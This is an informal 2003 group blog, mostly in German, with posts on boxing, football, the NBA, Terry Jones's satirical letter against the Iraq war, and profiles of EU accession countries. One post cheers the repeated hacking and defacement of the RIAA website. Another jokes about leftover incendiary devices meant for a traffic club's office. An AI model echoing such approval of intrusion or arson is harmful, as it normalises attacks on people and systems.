    Etienne war mit 16, 17 Jahren eines der vielver-sprechendsten Talente der USA im American Football, beging aber mit zwei Freunden im Alter von 17 einen Raubüberfall auf eine Shopping Mall und wurde zu 40 Jahren Freiheitsstrafe verurteilt. Zehn Jahre hat er davon abgesessen und begann sofort nach seiner Entlassung 1998 seine Profi-Karriere als Schwergewichtsboxer.
    Beide, Tyson und Etienne, sind als HardPuncher bekannt und legen nicht wirklich sehr viel Wert auf eine solide Deckung. Allein deshalb schon war klar, dass dieser Kampf wohl kaum mehr als drei Runden dauern würde; dass er aber nach einem Offensiv-Feuerwerk schon nach 49 Sekunden endete (und das war nur Tysons sechstschnellstes KO), war schon überraschend. Trotzdem war das keine ganz klare Sache. Auch Tyson hatte nach diesen wenigen Sekunden schon ein Cut über dem rechten Auge.
    Fast interessanter als der Kampf selbst war aber wiedereinmal die schier unglaubliche Vorgeschichte. Noch 10 Tage vor dem Kampf liess sich Iron Mike die linke Gesichtshälfte tätowieren, was gegen einen Linksausleger wie Etienne wohl nicht gerade empfehlenswert ist. Dieses Tattoo hatte dann auch Entzündungen und Fieberschübe zufolge; insgesamt sechs Mal wurde in der letzten Woche der Kampf ab- und wieder angesagt. Auch führte es dazu, dass viele Kommentatoren meinten Tyson würde den Kampf gar nicht ernstnehmen, sein Co-Trainer kündigte nur zwei Wochen vor dem Kampf seinen Job wegen Trainigsfaulheit seines Schützlings.
    Jetzt nach dem Kampf kann man sagen, dass dieser Kampf zwar Tyson´s Karriere wohl beendet hätte, wenn er verloren hätte, aber auch, dass er fitter (5 Kilo leichter) und beweglicher war als noch im Juni bei seiner 8-Runden-Niederlage gegen Lennox Lewis. Der Körper des ehemaligen Undisputed Heavyweight Champions war heute nacht sicherlich im Idealzustand, wie es allerdings um seinen Geist bestimmt ist, ist immer so eine Frage ;-)
    (uups, hoffentlich liest er das nicht)
    Was sagt uns dieser Kampf von gestern jetzt über die Zukunft des Schwergewichtsboxen??
    Es war klar, dass Tyson einen beeindruckenden Sieg gegen Etienne braucht, um einen Rückkampf gegen Lewis zu bekommen. Beeindruckend war der Sieg gestern natürlich schon, aber in seinem Sieger-Interview sagte er, dass er zur Zeit gar nicht gegen Lewis kämpfen will. Eine neuerliche Niederlage gegen den Weltmeister würde seine Karriere wohl endgültig beenden.
    Durch Tyson´s Absage an Lewis steigen jetzt wieder die Chancen der Klitschko-Brüder endlich den Box-Olymp zu besteigen. Vitali möchte ja schon die ganze Zeit gegen Lewis antreten, dieser hätte aber einen Rückkampf gegen Tyson bevorzugt (versteh ich auch ;-) ) anstatt sich mit einem der beiden Ukrainer anzulegen. Wenn jetzt Tyson diesen Kampf aber wirklich nicht will und vor seinem endgültigen Abschied gegen Lewis oder einen Klitschko noch ein, zwei Kämpfe gegen schlagbarere Gegner bestreiten will, wird es wohl im April oder Mai endlich zum Aufeinandertreffen Lewis – Klitschko kommen; yesssss!!!
    :: SCHADE HERMANN  bully  22.02.2003 22:31:17
    Bei Wetten, Dass... hatte Hermann Maier heute eine grossartige Gelegenheit dem Tormann des FC Bayern Oliver Kahn eine kleine Spitze zu verpassen...
    leider hat er sie verpasst ;-(

    Auf Gottschalks Frage „Bist du auch Fussballfan, gehst du hie und da ins Stadion?“ hätte ein kurzes „Ja, ich bin Austria Salzburg – Fan, an die kannst du dich doch sicher auch noch erinnern, Olli, oder?“ genügt... ;-)))
    :: LETTER TO THE OBSERVER  bully  22.02.2003 15:19:23
    A letter to the London Observer from Terry Jones of Monty Python

    Sunday January 26, 2003 The Observer

    I´m really excited by George Bush´s latest reason for bombing Iraq: he´s running out of patience. And so am I! For some time now I´ve been really pissed off with Mr. Johnson, who lives a couple of doors down the street.

    Well, him and Mr. Patel, who runs the health food shop. They both give me queer looks, and I´m sure Mr. Johnson is planning something nasty for me, but so far I haven´t been able to discover what.

    I´ve been round to his place a few times to see what he´s up to, but he´s got everything well hidden. That´s how devious he is. As for Mr. Patel, don´t ask me how I know, I just know - from very good sources - that he is, in reality, a Mass Murderer. I have leafleted the street telling them that if we don´t act first, he´ll pick us off one by one.

    Some of my neighbours say, if I´ve got proof, why don´t I go to the police? But that´s simply ridiculous. The police will say that they need evidence of a crime with which to charge my neighbours. They´ll come up with endless red tape and quibbling about the rights and wrongs of a pre-emptive strike and all the while Mr. Johnson will be finalising his plans to do terrible things to me, while Mr. Patel will be secretly murdering people.

    Since I´m the only one in the street with a decent range of automatic firearms, I reckon it´s up to me to keep the peace. But until recently that´s been a little difficult. Now, however, George W. Bush has made it clear that all I need to do is run out of patience, and then I can wade in and do whatever I want!

    And let´s face it, Mr. Bush´s carefully thought-out policy towards Iraq is the only way to bring about international peace and security. The one certain way to stop Muslim fundamentalist suicide bombers targeting the US or the UK is to bomb a few Muslim countries that have never threatened us.

    That´s why I want to blow up Mr. Johnson´s garage and kill his wife and children. Strike first! That´ll teach him a lesson. Then he´ll leave us in peace and stop peering at me in that totally unacceptable way.

    Mr. Bush makes it clear that all he needs to know before bombing Iraq is that Saddam is a really nasty man and that he has weapons of mass destruction - even if no one can find them. I´m certain I´ve just a much justification for killing Mr. Johnson´s wife and children as Mr. Bush has for bombing Iraq. Mr. Bush´s long-term aim is to make the world a safer place by eliminating ´rogue states´ and ´terrorism´. It´s such a clever long-term aim because how can you ever know when you´ve achieved it?

    How will Mr. Bush know when he´s wiped out all terrorists? When every single terrorist is dead? But then a terrorist is only a terrorist once he´s committed an act of terror. What about would-be terrorists? These are the ones you really want to eliminate, since most of the known terrorists, being suicide bombers, have already eliminated themselves. Perhaps Mr. Bush needs to wipe out everyone who could possibly be a future terrorist? Maybe he can´t be sure he´s achieved his objective until every Muslim fundamentalist is dead? But then some moderate Muslims might convert to fundamentalism. Maybe the only really safe thing to do would be for Mr. Bush to eliminate all Muslims?

    It´s the same in my street. Mr. Johnson and Mr. Patel are just the tip of the iceberg. There are dozens of other people in the street who I don´t like and who - quite frankly - look at me in odd ways. No one will be really safe until I´ve wiped them all out. My wife says I might be going too far but I tell her I´m simply using the same logic as the President of the United States. That shuts her up.

    Like Mr. Bush, I´ve run out of patience, and if that´s a good enough reason for the President, it´s good enough for me. I´m going to give the whole street two weeks - no, 10 days - to come out in the open and hand over all aliens and interplanetary hijackers, galactic outlaws and interstellar terrorist masterminds, and if they don´t hand them over nicely and say ´Thank you´, I´m going to bomb the entire street to kingdom come.

    It´s just as sane as what George W. Bush is proposing - and, in contrast to what he´s intending, my policy will destroy only one street.

    -Terry
    :: danke fuer die verlorenen monate...  ste  20.02.2003 22:19:11


    ...war ja aeusserst notwendig; schuessel ich kann dir gar nicht sagen was ich dich alles heissen will...ausser:DANKE DU ARSCH !!!
    :: fm4 trackservice  sTe  20.02.2003 14:56:05
    endlich was zum nachchecken was gerade oder zu welcher uhrzeit auf fm4 laeuft: fm4 trackservice
    fragt mich nicht woher ich den link hab - ist noch nicht offiziell ...

    also kind of funny
    and this article is quite interesting
    https://www.win2day.at  romario11  19.02.2003 10:08:40
    Nachdem ich mich gestern beim biersaufen nach dem tennis so beschwert habe, dass ich keinen zugang zu meinen daten auf Webclub.at habe, weil diese fallotten auf win2day umstellen, muss ich heute alles zurücknehmen. die neue site is super! und das beste daran ist, dass endlich tipp3 integriert ist. gute arbeit, leute!
    :: open your mind  sTe  18.02.2003 11:54:44
    Flash Mind Reader try and u´ll see
    :: NME - AWARDS  bully  17.02.2003 14:34:17
    Sechs Wochen hatten die Leser der englischen Musikzeitschrift NME Zeit in den verschiedensten Kategorien der Musikbranche ihre Wertungen abzugeben.
    Gestern Abend fand nun im Hammersmith Palais in London die Preisverleihung statt. Hier die wichtigsten und interessantesten Kategorien und deren Preisträger:
  • BEST UK BAND - Oasis
  • BEST INTERNATIONAL BAND - The Hives
  • BEST LIVE BAND - The Datsuns
  • BEST NEW BAND - The Yeah Yeah Yeahs
  • BEST VIDEO - BRMC ´Whatever Happened To My Rock N Roll?´
  • BEST ALBUM - Coldplay ´A Rush Of Blood To The Head´
  • BEST SINGLE - The Vines ´Get Free´
  • GODLIKE GENIUS - The Clash
  • WORST ALBUM - Robbie Williams ´Escapology´
  • WORST SINGLE - Robbie Williams ´Feel´
  • WORST BAND - Nickelback
  • VCÖ für "City-Maut" für Wien  romario11  17.02.2003 09:26:21

    Geht es nach dem Verkehrsclub Österreich (VCÖ), soll das Stauproblem von Wien mit einer "City-Maut" gelöst werden. Die Maut soll je nach Tageszeit unterschiedlich hoch sein.

    Weiss jemand wo sich der VCÖ befindet? ich habe da einige brandsätze zuviel für die opernballdemo produziert und müsste diese mal loswerden...
    :: drool over  sTe  15.02.2003 17:07:10
    the 9000PRO XXXX birth of the pieced-together-monster .....
    got first place in "The First Video Card Modding Contest" section...
    :: iraqchart  sTe  13.02.2003 17:00:40
    auf die frage "Befürworten Sie militärische Aktionen gegen den Irak?" :


    Quelle: Gallup International
    :: SILVER GOAL ersetzt GOLDEN GOAL  bully  02.12.2003 23:22:21

    Wiedereinmal steht eine fussballerische Neuerung ins Haus. Schon bei der EURO im nächsten Jahr in Portugal wird es das von vielen gehasste Golden Goal nicht mehr geben!!!
    Es wird durch das Silver Goal ersetzt.
    Was heist das nun konkret? Geht ein Spiel in eine Verlängerung, ist es nach dem ersten Tor einer Mannschaft nicht beendet, sondern wird fortgeführt bis zum Ende der jeweiligen Halbzeit. Schiesst also eine Mansschaft in der 95. Minute in einer Verlängerung ein Tor, bleiben der gegnerischen Mannschaft noch zehn Minuten diesen Rückstand wieder zu egalisieren. Sollte es nach der ersten Hälfte der Verlängerung (wieder) Unentschieden stehen, wird das Spiel auf jeden Fall bis zur 120. Minute fortgesetzt. Führt aber eine Mannschaft nach der ersten Hälfte der Verlängerung, ist das Spiel beendet.
    Meine Meinung: Klingt gut, meine Herren!!!
    Ist mir auf jeden Fall um einiges lieber als das Golden Goal. Spannung und Dramatik bleiben so sicher erhalten...
    :: Diego - Ein (kommender) Superstar  bully  02.12.2003 12:11:55

    Zur Zeit scheint in Brasilien ein neuer Stern am Fussballhimmel aufzugehen.
    In zwei Wochen, am 28. Februar, wird Diego Ribas da Cunha, kurz Diego, 18 Jahre alt.
    Der offensive Mittelfeldspieler (Nummer 10) vom FC Santos wurde schon über Weihnachten sehr heftig vom AC Milan umworben, entschied sich aber dafür bei seinem Stammclub zu bleiben und sorgt dort jetzt in der Copa Libertadores Spieltag für Spieltag für Furore.
    Pele sagt über ihn: „Der Junge ist unglaublich, er muss Augen auf den Füssen haben.“
    Mit seinem Traumtor vom letzten Mittwoch ist sein Marktwert sicherlich wieder um ein paar Millionen Euro in die Höhe geklettert. Zur Zeit scheinen wohl Real Madrid, Juventus und der FC Bayern die besten Karten im Verhandlungspoker zu haben. Dass Real es nie kapieren wird, dass sie offensiv schon stark genug sind und lieber mal in die Abwehr investieren sollten, ist ein anderes Thema. ;-)
    Wir Europäer werden uns wohl leider erst nächste Saison von den Qualitäten des Youngsters überzeugen können, da es ja noch immer kein TV-Sender der Mühe wert findet zumindest die wichtigsten Spiele der CL in unsere Haushalte zu übertragen.
    Schon jetzt aber sind Millionen Brasilianer davon überzeugt, dass ihr Diego sie bei der WM 2006 in Deutschland zum zweiten Titel in Europa (nach 1958 mit Pele in Schweden) führen wird.
    :: Q  sTe  02.10.2003 18:51:15
    :: A BIG HAND FOR A GREAT FAREWELL  bully  02.10.2003 14:52:39

    Sonntag, 9. Februar 2003, 20.30 Uhr Ortszeit
    Philips Stadium, Atlanta, Georgia
    Wie immer war das zweite Wochenende im Februar auch dieses Jahr das Wochenende, an dem sich die NBA mit dem All Star Weekend selbst feiert.
    Doch dieses Mal war alles anders.
    Das Spiel des Westens gegen den Osten mutierte zum grandiosen Abschiedsspiel. Neben mir war eine Milliarde Zuschauer weltweit live dabei. Der Grund: Wahrscheinlich einer der grössten Sportler aller Zeiten, bestimmt aber der beste Basketballer aller Zeiten wird Ende dieser Saison seine phantastische Karriere beenden:
    His Airness, Michael Jordan
    Amerikanische Superstars aus allen Sparten waren gekommen um der legendären Nummer 23 die Ehre zu erweisen; die Half Time Show von Mariah Carey, die in den zwei verschiedenen Dressen des Protagonisten auftrat (Chicago Bulls, Washington Wizards), war ein einziges Tribute to MJ. Das Hollywood - Happy End im gestrigen Spiel sollte ihm aber verwehrt bleiben. Drei Sekunden vor Ende der Verlängerung konnte Jordan (20 Punkte) den Osten durch einen wunderbaren Fade Away Jumper mit 138-136 in Führung bringen. Eine Sekunde vor Schluss allerdings glich Kobe Bryant noch aus, und das Spiel musste erstmals in der 53-jährigen Geschichte der NBA All Star Games in eine zweite Verlängerung gehen, in der sich der Westen dann klar mit 155-145 durchsetzen konnte.
    Es ist mir eine grosse Freude diese grandiose Karriere vom Beginn an beobachtet haben zu können. Bei den Olympischen Spielen 1984 in Los Angeles, zu Zeiten als die USA noch Amateure (College-Spieler) zu dieser Veranstaltung schickten, führte Jordan sein Team gemeinsam mit Patrick Ewing und Chris Mullen zur Goldmedaille. Seine darauffolgende NBA-Karriere krönte er mit sieben Titelgewinnen mit den Chicago Bulls und unzähligen Rekorden.
    Die NBA verliert in zwei Monaten ihren grössten Protagonisten und wird danach nicht mehr die selbe sein. Bei seiner Verabschiedungsrede, die immer wieder durch minutenlange standing ovations unterbrochen wurde, meinte er zwar, er würde das Spiel in gute Hände legen, wobei er in Richtung Bryant, Kidd, Iverson und Co deutete, aber diese Sportart verliert zweifelsohne ihren besten.
    Heute in einer Woche wird Jordan 40 Jahre.
    Bye bye MJ!!!
    :: again and again and YES again :)  sTe  02.08.2003 19:44:17
    modernem raeuber und gendarm spiels der doch eher laestigen art muss sich die RIAA seit einger zeit stellen; ihre website wurde das x-te mal in den letzten monaten gehacked, defaced, offline gestellt...auch mehrmalige provider wechsel konnten keine abhilfe schaffen; (full story)

    mein fazit: wer austeilt muss auch einstecken koennen :)
    last but not least
    :: MALTA
      bully  03.05.2003 00:22:15

    Fläche: 315 km²
    Einwohner: 386.000
    Hauptstadt: La Valletta
    Währung: maltesische Lira (1 Lm = 2,5 €)
    Religion: 70% Katholiken
    Nationalfeiertag: 21. September
    Länderdomain (Top-Level): .mt

    In der Jungsteinzeit war Malta ein Zentrum der Megalithkultur. Mehrere große Tempelanlagen sind noch erhalten. Im 6. Jahrhundert wurde die Insel von den Karthagern, später von Rom erobert. 870 wurde die Insel von den Arabern besetzt. 1090 geriet Malta unter normannische Herrschaft; später wurde es zu einem Lehen des Königreiches Sizilien. 1530 gab Kaiser Karl V. Malta dem Johanniterorden (der sich danach Malteserorden nannte) zu Lehen. Die Johanniter beherrschten die Inseln bis zum 19. Jahrhundert. Nach einer Belagerung durch osmanische Türken wurde die heutige Hauptstadt Valletta 1565 gegründet und mit Befestigungsanlagen ausgestattet. 1798 wurde Malta von Napoleon erobert. Da die Malteser die französische Herrschaft ablehnten, suchten sie Hilfe bei den Briten, die 1799 den Rückzug der Franzosen erzwangen. 1814 wurde Malta als Kronkolonie Teil des britischen Weltreiches. 1964 erhielt Malta die volle Unabhängigkeit. Seit 1974 ist Malta eine parlamentarische Republik, und seitdem wird in einer Schaukelpolitik mal eine Annäherung an die arabischen Länder, dann wieder eine Annäherung an Europa gesucht. 1990 stellte Malta einen Antrag auf Vollmitgliedschaft in der Europäischen Union, der 1993 abgelehnt wurde. Als wichtigster Grund wurde die zu geringe Größe des Staates genannt. Die maltesische Hauptstadt La Valletta (7.000 Einwohner) ist eine der sehenswertesten Festungsstädte in Europa. Die gewaltigen Mauern sind noch fast vollständig intakt. Kleine Läden statt Kaufhausketten bieten ihre Waren an. Valletta ist eine am Reißbrett entstandene Stadt, was das rasterförmige Netz aus sich rechtwinklig schneidenden Straßen belegt. Sehr berühmt sind auch die Gartenanlagen Hastings Gardens und Lower Baracca Gardens. Auf jeden Fall auch beachtenswert ist The Malta Experience, eine Audiovisionsshow, die eine Kurzfassung der maltesischen Geschichte bietet.

    Staatspräsident: Guido de Marco
    Berühmtester Malteser:
    Michael Mifsud (Fussballer)
    :: ZYPERN  bully  02.05.2003 14:11:55

    Fläche: 9.251 km²
    Einwohner: 700.000
    Hauptstadt: Lefkosia, früher Nikosia
    Währung: Zypern-Pfund (1 € = 0,54 Z£)
    Religion: 84% Griechisch-Orthodox, 15% Moslems
    Nationalfeiertag: 25. April
    Länderdomain (Top-Level): .cy

    Zypern, die drittgrößte Mittelmeerinsel, ist seit ca. 9.000 Jahren besiedelt. Eine wirtschaftliche Blütezeit erlebte Zypern in den Jahren von 1400 bis 1200 v. Chr.. Um 1050 v. Chr. zerstörten Erdbeben viele Handelsstädte - erst im achten Jahrhundert v. Chr. errichteten die Phönizier wieder eine Siedlung in Kistion. Zypern blühte mit verschiedenen Stadtkönigreichen wieder auf. Nach abwechselnder Beherrschung durch Assyrer, Ägypter und Perser entwickelte sich Zypern unter Alexander dem Großen zu einer hellenistischen Provinz. Zypern wurde 58 v. Chr. von Rom annektiert und nach der Zweiteilung des Reiches von Byzanz regiert. In dieser Zeit wurden viele bedeutende Kirchen und Burgen erbaut. Im 11. Jahrhundert begann die Herrschaft der Franken und später der Venezier. Um 1570 fiel Zypern in einer Schlacht unter osmanische Herrschaft. 1925 wurde Zypern britische Kronkolonie. Das Erbe, dass in Zypern auf der linken Seite gefahren wird, ist ein Andenken an diese Zeit. Zypern wurde erst nach einem Bürgerkrieg 1958 unabhängig. Der Konflikt zwischen Türken und Griechen gipfelte in einer türkischen Invasion 1974, der ethnische Säuberungen in allen Landesteilen folgten. Die ausgerufene Republik Nordzypern wird jedoch von keiner Nation (außer der Türkei) anerkannt. Zypern ist eine präsidiale Republik mit zwei sich selbst verwaltenden Bevölkerungsgruppen. Dies führt de facto zu zwei wirtschaftlich und verwaltungsmäßig getrennten Teilen – dem international anerkannten griechisch-zypriotischen und dem türkisch-zypriotischen Teil. Ersterer (der eigentliche Beitrittskandidat) hat einen Präsidenten mit weitreichenden Vollmachten; die Gesetzgebungskompetenz liegt beim Repräsentantenhaus.
    Die innere Grenze Zyperns verläuft mitten durch die Altstadt der Hauptstadt Lefkosia (230.000 Einwohner). Dennoch wurde versucht, die Fußgängerzone auf beiden Seiten attraktiv zu gestalten. Sehenswert sind unter anderem das Leventis-Museum mit Exponaten zur Geschichte der Stadt und das Byzantinische Museum, das über die Entwicklung der Ikonenmalerei informiert und über 150 Ikonen ausstellt. Daneben findet man im Nationalmuseum kostbare archäologische Funde Zyperns, unter anderem 2.000 zum Teil lebensgroße Terrakottafiguren. Im nördlichen Teil Lefkosias hat man vom Minarett der Selimiye-Moschee (ehemalige Sophienkathedrale) einen schönen Überblick über die gesamte Stadt.

    Staatspräsident: Glafcos Clerides
    Berühmteste Zyprioten:
    George Michael (Sänger)
    Muzzy Izzet (Fussballer)
    Fatima Whitbread (Speerwerferin)
    Aphrodite (Göttin)
    :: ground zero - soon to come  bully  02.05.2003 11:59:29


    Noch 2 Projekte stehen für Ground Zero zur Auswahl, beide präsentiert unter www.renewnyc.com.
    Vorschlag #1 (links), das World Cultural Center, ist vom Architekturbüro THINK und soll 499 Meter hoch werden.
    Vorschlag #2 (rechts), die Gardens of the World, stammt vom Studio Libeskind und soll 530 Meter hoch werden.
    Noch Ende dieses Monats fällt die endgültige Entscheidung.
    Soweit ich mich erinnern kann wurde kurz nach den Anschlägen vom 11. September 2001 von allen Seiten versichert, dass kein Neubau in New York je wieder höher als 50 Stockwerke sein soll und das Empire State Building für immer das höchste in Manhattan bleiben soll. Von diesem Vorhaben scheint man sich nun meilenweit entfernt zu haben. Egal welches Projekt gewinnt, am Ground Zero entsteht das höchste Gebäude der Welt. Zur Zeit sind das noch die Petronas Towers in Kuala Lumpur mit je 445m Höhe.
    Mir persönlich gefällt das linke Projekt besser...
    :: SLOWENIEN  bully  02.04.2003 21:50:09

    Fläche: 20.256 km²
    Einwohner: 2 Mio.
    Hauptstadt: Laibach
    Währung: Tolar (1 € = 220 SLT)
    Religion: 70% Katholiken
    Nationalfeiertag: 25. Juni
    Länderdomain (Top-Level): .si

    Um 600 breitete sich der südslawische Stamm der Slowenen vom Plattensee bis Oberösterreich aus. Vom 11. bis 13. Jahrhundert teilten sich Bayerische Fürsten das slowenische Gebiet. Dann, 1282, bekamen die Habsburger die slowenischen Länder. Als 1918 die österreichisch-ungarische Monarchie zusammenbrach, gründete Slowenien mit Kroatien, Serbien und Montenegro ein Königreich, das der Vorläufer des späteren Jugoslawien war. 1941 zerschlugen deutsche, italienische und ungarische Truppen den jugoslawischen Staat. Doch dieser entstand 1945 neu und Slowenien wurde eine seiner Republiken. Nach einer Volksabstimmung erklärte sich Slowenien 1991 für unabhängig und blieb es trotz serbischen Widerstands. Heute ist Slowenien ungefähr gleichgross wie Niederösterreich. Die Stadt Laibach, die heute schon fast 300.000 Einwohner zählt, wurde erstmals im 1.Jh.v. Chr. als römisches Emona erwähnt und dann im 5. Jh. vom Hunnenkönig Attila fast völlig zerstört. Bessere Zeiten erlebte Ljubljana wieder unter dem Kärntner Herrschergeschlecht der Spannheimer und erhielt Mitte des 13. Jh. das Stadtrecht. Bald danach wurde es als Hauptstadt des Herzogtums Krain (mit kurzer Unterbrechung von 1809 - 1813 als Hauptstadt der illyrischen Provinz Napoleons) bis 1918, fast 600 Jahre lang, Teil der österreichisch-habsburgischen Monarchie.

    Staatspräsident: Janez Drnovsek
    Berühmteste Slowenen:
    Milan Kucan (Ex-Präsident)
    Urska Hrovat (Skifahrerin)
    Jure Kosir (Skifahrer)
    Primoz Peterka (Skispringer)
    Srecko Katanec (Fussballer und Trainer)
    Zlatko Zahovic (Fussballer)
    :: no use  sTe  02.04.2003 12:06:59
    Airline Meals - the first website about nothing but airline food :)

    schlecht recherchiert !!!

    man uses PC, washing machine to brew beer
    :: the hire  sTe  02.03.2003 23:35:46
    BMW laeutet eine neue aera in der automobil werbung ein; unter dem label ´bmwfilms´ wurden 3 neue ca 15 minuetige kurzspielfilme veroeffentlicht, wohlbemerkt mit je einer eigenen vollstaendigen handlung; produzenten und regisseure sind keine geringeren als Tony Scott, Ridley Scott sowie John Woo; als darsteller fungieren Gary Oldman, James Brown und Clive Oliver; alle 3 filme sind aeusserst empfehlenswert...
    in DVD qualitaet zur zeit im windows media 9 format (free) und ein spot hat ca 60MB... aber es lohnt sich,...
    wers nicht downloaden will soll mich kontaktieren...
    :: UNGARN  bully  02.03.2003 18:09:56

    Fläche: 93.030 km²
    Einwohner: 10 Mio.
    Hauptstadt: Budapest
    Währung: Forint (1 € = 250 HuF)
    Religion: 2/3 Katholiken, 1/3 Protestanten
    Nationalfeiertag: 23. Oktober
    Länderdomain (Top-Level): .hu

    Schon früh besiedelt (ab dem 1. Jahrhundert v.Chr. war das heutige Ungarn Teil der römischen Provinzen Dakien und Pannonien) entwickelte sich das ungarische Reich vom Ende des 10. bis zum 13. Jahrhundert zu einer führenden Macht in Europa. Unter Matthias Corvinus, der 1458 zum König gekrönt wurde, erlebte das Land seine höchste Blüte. Vom 16. bis zum 19. Jahrhundert stand Ungarn unter der Herrschaft der Türken bzw. der Habsburger. Nach erbitterten Freiheitskämpfen wurde das Land 1849 unabhängig, gehörte aber bis 1918 zur Österreichisch-Ungarischen Doppelmonarchie. 1946 wurde die kommunistische Republik, 1948 die Volksrepublik Ungarn ausgerufen. Eine antisowjetische Revolution im Jahr 1956 wurde von sowjetischen Truppen niedergeschlagen. In den achtziger Jahren wurden umfassende politische und gesellschaftliche Reformen eingeleitet, im Oktober 1989 die demokratische Ungarische Republik proklamiert. Die ersten freien Wahlen seit 45 Jahren fanden statt. 1990 trat Ungarn als erstes mitteleuropäisches Land des Ostblocks dem Europarat bei.
    Seit Mai 2002 ist in Ungarn die vierte frei gewählte Koalitionsregierung im Amt. Der heutige Ministerpräsident Peter Medgyessy führte die sozialdemokratische MSZP zu einem Sieg bei den Parlamentswahlen und löste die konservativ-liberale Regierung von Viktor Orban ab.
    Budapest (1,8 Mio. Einwohner), die Stadt an den beiden Seiten der Donau, ist ein Monument der Vergangenheit mit römischen und türkischen Einflüssen, eine moderne Großstadt und ein aufstrebendes Kulturzentrum. Das hügelige "Buda" liegt an der rechten Donauseite und beheimatet die Altstadt. Dagegen ist das ebene "Pest" auf der linken Donauseite, das zwei Drittel der Stadtfläche ausmacht, mehr das Zentrum des wirtschaftlichen und kulturellen Lebens.

    Staatspräsident: Ferenc Madl
    Berühmteste Ungarn:
    Tommy Ramone (Schlagzeuger und Produzent)
    Krisztina Egerszegi (Schwimmerin)
    Ferenc Puskás (Fussballer)
    ZsaZsa Gabor (Schauspielerin)
    Franz Liszt - (1811 - 1886) (Komponist)
    Harry Houdini (1874 - 1926) (Magier)
    Béla Bartók - (1881 - 1945) (Komponist)
    Sir Georg Solti - (1912 - 1997) (Dirigent)
    :: ---  sTe  02.03.2003 17:42:21
    found this game called Gridlock;
    Move the blocks around so that the blue block can get out...

    Q: Why does Bush hate Saddam Hussein?
    A: Because he tried to BAG DAD
    :: SLOWAKEI  bully  03.02.2003 00:06:32

    Fläche: 49.030km²
    Einwohner: 5,3 Mio.
    Hauptstadt: Pressburg
    Währung: Slowakische Krone (1€ = 40SvK)
    Religion: 60 % Katholiken
    Nationalfeiertag: 1. September
    Länderdomain (Top-Level): .sk

    Die Slowakei gehörte seit dem zehnten Jahrhundert als "Oberungarn" zum Land Ungarn und später zu Österreich-Ungarn. Die Slowaken versuchten mehrmals, unabhängig zu werden. Nach dem Ersten Weltkrieg entstand die Tschechoslowakische Republik als Staatenbund. 1938 wurde er von den einmarschierten Deutschen aufgelöst (in "Protektorat Böhmen und Mähren" und den "Schutzstaat Slowakei"), fand aber 1945 wieder zusammen. 1960 wurde aus der Tschechoslowakei eine "Sozialistische Republik". Im Zuge der Umwälzungen im Osten Europas trennten sich 1993 auch die beiden Staaten wieder und die Slowakische Republik wurde ein selbstständiger Staat mit demokratischer Verfassung.

    Staatspräsident: Rudolf Schuster
    Berühmteste Slowaken:
    Daniela Hantuchova (Tennisspielerin)
    Vladimir Janocko (Fussballer)
    Adriana Sklenarikova-Karembeu (Model)
    Stefan Banic (1870-1941) (Erfinder des Fallschirms)
    Andy Warhol (1928 - 1987) (Künstler)
    Alexander Dubcek (1921 - 1992) (Politiker)
    :: TSCHECHIEN  bully  02.02.2003 11:31:42

    Fläche: 78.866km²
    Einwohner: 10,3 Mio.
    Hauptstadt: Prag
    Währung: Tschechische Krone (100CzK = 3€)
    Religion: 40 % Atheisten 40 % Katholiken
    Nationalfeiertag: 28. Oktober
    Länderdomain (Top-Level): .cz

    Im 4. Jahrhundert ließen sich im Gebiet der heutigen Tschechischen Republik mehrere Keltenstämme nieder. Der Stamm der Bojer hinterließ den Landesnamen "Böhmen". Karl IV. war im 14. Jahrhundert böhmischer König und römischer Kaiser. Er gründete 1348 Europas älteste Universität, die Karls-Universität in Prag. Die Renaissance brachte italienische Künstler nach Böhmen; so entstanden zahlreiche Schlösser, Paläste und Stadtkomplexe. Dann kamen die Habsburger von 1526 bis 1918 auf den tschechischen Thron; Prag (heute 1,25 Mio. Einwohner) war wissenschaftliche und kulturelle Metropole Europas. Nach dem Ersten Weltkrieg entstand aus dem böhmischen Reich die Tschechische Republik. Diese gründete mit der benachbarten Slowakei einen Staatenbund: die Tschechoslowakei, die 1993 wieder auseinander ging. So entstand die gegenwärtige Tschechische Republik, die aus den Ländern Böhmen und dem südlich liegenden Mähren besteht.
    Neben dem AKW Temelin sind vor allem die immer noch gesetzlich verankerten Benes-Dekrete, benannt nach dem ehemaligen Präsidenten Edvard Benes, nicht gerade förderlich für einen reibungslosen Beitritt der Tschechen in die EU.

    Staatspräsident: zur Zeit keiner
    Berühmteste Tschechen:
    Vaclav Havel (Autor und Ex-Präsident)
    Jan Zelezny (Speerwerfer)
    Jaromir Jagr (Eishockeyspieler)
    Ivan Lendl (Tennisspieler)
    Martina Navratilova (Tennisspielerin)
    Jan Hus (1369 - 1415) (Religionsgründer)
    Antonin Dvorak (1841-1904) (Komponist)
    Franz Kafka (1883 - 1924) (Autor)
    Emil Zatopek (1922 – 2000) (Langstreckenläufer)
    :: st.moritzZZ  sTe  02.01.2003 10:49:02
    feelosophee´s wm diary is online ...
    due to lack of time i hope it will grow soon...
    :: POLEN  bully  30.01.2003 19:20:39

    Fläche: 312.683km²
    Einwohner: 39 Mio.
    Hauptstadt: Warschau
    Währung: Zloty (1 € = 4zl)
    Religion: 95% Katholiken
    Nationalfeiertag: 11. November
    Länderdomain (Top-Level): .pl

    Polens Geschichte beginnt im Jahre 966 mit dem Übertritt eines Häuptlings der Polanen zum Christentum. Dieser dehnte vom Raum Posen stammend seinen Staat auf Schlesien und Krakau aus. Seine Nachfolger erweiterten ihre Macht bis nach Böhmen und Kiew. Doch im zwölften Jahrhundert teilte Boleslaw III. das Reich unter seinen vier Söhnen auf. Polen versank in der Bedeutungslosigkeit. Im 14. Jahrhundert errang Herzog Wladislaw Lokietek die Herrschaft über ganz Polen und wurde 1320 zum König gekrönt. Das mächtige Litauen wurde mit Polen vereinigt. Im 16. Jahrhundert beherrschte der Adel in Warschau den gemeinsamen Reichstag von Polen-Litauen. Doch das Land wurde kraftlos; Russland, Preußen und Österreich teilten es im 18. Jahrhundert unter sich auf. 1918 entstand Polen als Republik wieder. Doch der zweite Weltkrieg teilte Polen erneut: zwischen Deutschland und Russland. Nach dem Kriegsende musste Polen ein großes Stück seines Gebiets an die Sowjetunion abtreten und erhielt dafür ein Stück von Deutschland. Diese Grenze wurde von der Bundesrepublik Deutschland 1990 vertraglich anerkannt.
